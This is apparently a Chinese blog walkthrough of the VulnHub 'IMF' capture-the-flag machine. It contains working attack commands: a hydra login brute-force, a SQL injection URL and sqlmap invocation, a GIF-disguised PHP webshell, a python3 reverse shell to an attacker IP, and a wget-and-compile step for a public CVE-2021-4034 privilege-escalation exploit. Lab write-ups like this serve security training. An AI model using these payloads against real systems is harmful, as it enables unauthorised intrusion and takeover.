IMF缓冲区提权渗透

IMF缓冲区提权渗透

靶机地址:https://www.vulnhub.com/entry/imf-1,162/

靶机难度:中级(CTF)

服务端口扫描

image-20250115195822651

访问80端口

image-20250115195033235

端口服务探测,能下手的只有80端口

image-20250115195327320

这儿只找到一个关于,联系我们

image-20250115200253845

只有一个80端口,本次靶机考核的应该就不是xss,可以直接跳过

image-20250115200526870

下面似乎有三个用户

image-20250115200239162

查看源码,这儿有一个flag1{YWxsdGhlZmlsZXM=}

image-20250115200407949

解码看看

image-20250116012252282

得到明文:allthefiles

网页上也没有其他东西了,用dirsearch进行目录扫描试试

image-20250115200843632

表面上没有任何信息了,但又肯定存在其他信息,只能对源码进行审计

image-20250116012534522

Place favicon.ico and apple-touch-icon.png in the root directory

将favicon.ico和appletouch -icon.png放在根目录下

直到看到这些编码信息

image-20250116012738714

将前面两个两个拼凑在一起

ZmxhZzJ7YVcxbVlXUnRhVzVwYzNS

image-20250116012839038

后面的那个就普通解码,得到后半部分

image-20250116012800097

flag合起来就是,这里还是一个flag

flag2{aW1mYWRtaW5pc3RyYXRvcg==}

继续解码,imfadministrator,这个结果可能是密码信息,但是网页上并没有登录的功能,22端口也没有开启

image-20250116013054742

那么就是目录了

image-20250116013225079

这里不清楚用户名的话,还记得刚刚页面上的信息嘛,第一个是导演,第二个是副主任,第三个是参谋长

image-20250116013427893

先目录扫描一下,看看能不能越权

image-20250116013938181

不行

image-20250116013951607

sql注入,万能密码

image-20250116014105958

现在唯一没有利用上的就是第一个flag明文,可能是密码吧,allthefiles,但是也没有效果,继续查看源码

image-20250116014255629

I couldn’t get the SQL working, so I hard-coded the password. It’s still mad secure through. – Roger

我无法使SQL工作,所以我硬编码了密码。还是很安全的。——罗杰

这不是又是一个用户名,用户名不存在(无效的用户名),这又是一个漏洞点

image-20250116014628771

试试刚刚的用户(导演 rmichaels,副主任 akeith,参谋长 estone),导演为密码错误

image-20250116014757580

副主任 akeith 无效的用户名

image-20250116014934713

参谋长 estone ,不存在

image-20250116015004263

看样子只有导演能登陆了,用burp爆破

image-20250116015726200

社区版很慢,考试只能用社区版,还有啥办法嘞,可以试试 hydra ,之前都是爆破一些协议,没有对http请求的内容进行爆破,这个还真没试过,我是菜鸡

image-20250118232406106

分析页面信息 页面登录错误的信息为Invalid

image-20250119013206219

登录失败的表单数据

image-20250119013318853

那么就能得到hydra的参数详解

hydra -l rmichaels -P /usr/share/wordlists/fasttrack.txt -t 4 -vV 192.168.209.132 http-post-form "/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid"

image-20250119012926522

都失败了

hydra:调用 Hydra 工具。

-l rmichaels:指定单个用户名为 rmichaels。这意味着 Hydra 将使用 rmichaels 作为用户名进行所有尝试。

-P /usr/share/wordlists/fasttrack.txt:指定密码字典文件为 /usr/share/wordlists/fasttrack.txtHydra 将从这个文件中读取密码,逐个尝试。

-t 4:设置同时运行的线程数为 4。这可以提高破解效率,但同时也会增加对目标服务器的负载。

-vV:显示详细的过程信息。这有助于了解 Hydra 的运行状态和尝试的用户名/密码组合。

192.168.209.132:目标服务器的 IP 地址。

http-post-form:指定服务类型为 HTTP POST 表单。

"/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid":指定表单路径、参数和错误消息。

/imfadministrator/index.php:表单的路径。这是目标服务器上处理登录请求的 PHP 文件的路径。

user=^USER^&pass=^PASS^:表单的参数。^USER^^PASS^ 是占位符,分别表示用户名和密码。Hydra 会将这些占位符替换为实际的用户名和密码进行尝试。

Invalid:错误消息。当表单返回该消息时,表示登录失败。Hydra 会根据这个错误消息来判断当前尝试的用户名和密码是否有效。

使用强加密的话,可以利用php的特性,进行绕过

image-20250116015929487

得到了flag3

flag3{Y29udGludWVUT2Ntcw==}

解密后的明文:continueTOcms

image-20250116020151288

进入到home

image-20250116020219859

试试文件包含

image-20250116021001713

file协议

image-20250116021032744

data协议

image-20250116021207363

php://filter伪协议

image-20250116021248659

sql注入测试,得到sql语法错误的结果,这里没有回显数据(暂定为盲注)

image-20250116021344331

继续添加参数,普通的盲注是行不通的,这里要在后面再添加一个单引号

image-20250116022201636

我们换一个页面试试,看看能不能找到其他回显数据,进一步判断是否可以使用其他类型的注入(找其他信息,尽量不要盲注,因为在oscp考试中,禁止使用商业化工具比如sqlmap),用order by行不通

image-20250116022830005

看样子是利用这个pagename,回显html数据的,这里发现一个union联合查询注入

image-20250116023650280

当前数据库

http://192.168.209.132/imfadministrator/cms.php?pagename=11111' union select concat(database())'#

# admin

接下来有一个很离谱的事儿,就是利用group_concat(111)能正常回显是吧,并且后面的sql语句没有报错

image-20250116030536309

但是我一换成table_name就完蛋啦,无奈自能用sqlmap了

image-20250116030656454

sqlmap脚本如下

sqlmap -u 'http://192.168.209.132/imfadministrator/cms.php?pagename=disavowlist' -p 'pagename' --dbms 'mysql' --level 3  --cookie 'PHPSESSID=rcvl9o0565ni5ub2ki19i1vcu3' --dump

可以看到这里是存在联合注入的

image-20250116031506856

访问一下,错误。。。。不管了

image-20250116031556442

看数据

image-20250116032502506

这里有一个二维码,扫扫看

image-20250116032536657

得到flag4,flag4{dXBsb2Fkcjk0Mi5waHA=}

image-20250116032629060

解码为一个php文件

image-20250116032723613

有一个文件上传

image-20250116032802592

burp抓包

image-20250116032937328

image-20250116033006321

burp爆破文件后缀,普通的一句话木马不行,那么就需要进行绕过

image-20250116033232081

webshell的绕过工具weevely

weevely generate <password> <path>

image-20250116103913158

把木马放到windows上进行上传,尝试各种的上传方法,只有图片格式的可以上传,还需要添加文件头欺骗

image-20250116103818354

但是我们并不知道文件的名称,有一个uploads文件夹,刚刚dirsearch扫出来的,查看上传成功的源码,dab037ffb2eb

image-20250116104412578

这里访问图片

image-20250116104507726

只有图片马,还需要一个文件包含的漏洞才可以getshell(找个半天没有。。。),但是gif不一样了

image-20250116220857930

写入一句话木马

echo 'GIF89a <?php $cmd=$_GET['cmd']; echo `$cmd`; ?>' > cmd.gif

上传

http://192.168.209.132/imfadministrator/uploads/dfd5fb101707.gif?cmd=id

image-20250116223515335

ls 查看当前目录,发现flag5,flag5_abc123def.txt

image-20250117184523203

cat flag5_abc123def.txt

http://192.168.209.132/imfadministrator/uploads/dfd5fb101707.gif?cmd=cat%20flag5_abc123def.txt

image-20250117184612848

flag5{YWdlbnRzZXJ2aWNlcw==}
# 解码
agentservices

利用python3反弹shell

export RHOST="192.168.209.130";export RPORT=6666;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

系统信息收集,ubuntu 16.04 版本

image-20250117194310282

但是这些exp都不行,这里提权有两种方法,一个是cve-2021-4034,一个是缓冲区溢出

image-20250117195252839

exp提权,kali

git clone https://github.com/arthepsy/CVE-2021-4034.git

靶机

wget 192.168.209.130:5000/cve-2021-4034-poc.c
gcc -o exp cve-2021-4034-poc.c
./exp

image-20250117194051649

第二种方法缓冲区溢出提权,看看参考文章吧,这里我的“敲门”服务开启端口失败了,可能是因为我用了提权脚本的问题。

image-20250118232120871

image-20250118232128691

附两篇写的比较好的文章参考(都是缓冲区溢出的):

https://www.freebuf.com/articles/system/329028.html

https://blog.csdn.net/ericalezl/article/details/131797477

往期推荐

往期推荐

不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学

防溯源小技巧

ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略

【oscp】vulnerable_docker,三种代理方法打入内网

【内网渗透】CobaltStrike与MSF联动互相上线的方式

【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS

【渗透测试】linux隐身登录

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
喜欢就支持一下吧
点赞16 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容